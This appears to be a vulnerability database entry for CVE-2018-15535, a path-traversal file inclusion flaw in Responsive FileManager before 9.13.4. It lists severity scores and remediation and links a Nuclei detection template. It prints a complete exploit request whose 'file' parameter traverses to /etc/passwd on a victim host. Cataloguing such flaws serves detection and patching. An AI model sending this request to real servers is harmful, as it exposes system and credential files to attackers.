| Title | Responsive FileManager <9.13.4 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.81247 |
| CVE ID | CVE-2018-15535 |
| CWE ID | CWE-22 |
| Tags | cve cve2018 lfi edb seclists tecrail vuln |
Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-15535.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-15535.pcap
N/AN/A